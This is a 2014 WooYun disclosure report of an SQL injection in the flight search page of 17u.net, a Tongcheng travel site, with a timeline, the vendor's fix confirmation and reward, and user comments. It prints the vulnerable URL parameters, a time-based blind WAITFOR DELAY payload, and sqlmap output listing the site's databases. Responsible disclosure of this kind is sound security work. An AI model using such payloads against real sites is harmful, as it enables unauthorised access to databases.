当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087985

漏洞标题:同程旗下网站旅交汇机票频道SQL注入

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 路人甲

提交时间:2014-12-20 22:28

修复时间:2014-12-27 18:24

公开时间:2014-12-27 18:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-20: 细节已通知厂商并且等待厂商处理中
2014-12-22: 厂商已经确认,细节仅向厂商公开
2014-12-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

1,注入点
http://www.17u.net/plane/jpresult.asp?ddlOrgCity1=PEK&ddlDesCity1=SHA&txtGoDate=2014-12-18
ddlOrgCity1和ddlDesCity1均存在注入点
2,Payload
http://www.17u.net/plane/jpresult.asp?ddlOrgCity1=PEK')waitfor%20delay'0%3a0%3a20'--&ddlDesCity1=SHA&txtGoDate=2014-12-18
Time盲注
3,PoC

---
Parameter: ddlOrgCity1 (GET)
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ddlOrgCity1=PEK') WAITFOR DELAY '0:0:10'--&ddlDesCity1=SHA&txtGoDate=2014-12-19
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] [17u_net]
[*] distribution
[*] IpDatk
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCCar
[*] TCCline
[*] TCCLineOrde


共计29个数据库,由于是Time盲注比较耗时,没在继续下去。

漏洞证明:

修复方案:

代码与变量分离,采用参数绑定方式赋值。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-22 11:45

厂商回复:

感谢对同程旅游的关注,一直没能用sqlmap重现。但是代码的确有问题,已修复。请提供下联系方式,200元京东礼品卡奉上。

最新状态:

2014-12-27:提前公开


漏洞评价:

评论

  1. 2014-12-21 03:26 | 苏州同程旅游网络科技有限公司(乌云厂商)

    哥,为啥我重现不了呢,你有另加tamper啥的参数么看见评论能发下联系方式到 end5MDg1MTIjbHkuY29t 谢谢

  2. 2014-12-21 20:39 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    重现不了就忽略呗 说明白帽子提交不仔细

  3. 2014-12-31 14:40 | Yns0ng ( 普通白帽子 | Rank:104 漏洞数:12 | 闭关修炼中)

    礼品卡已收到,☆⌒(*^-゜)v THX!!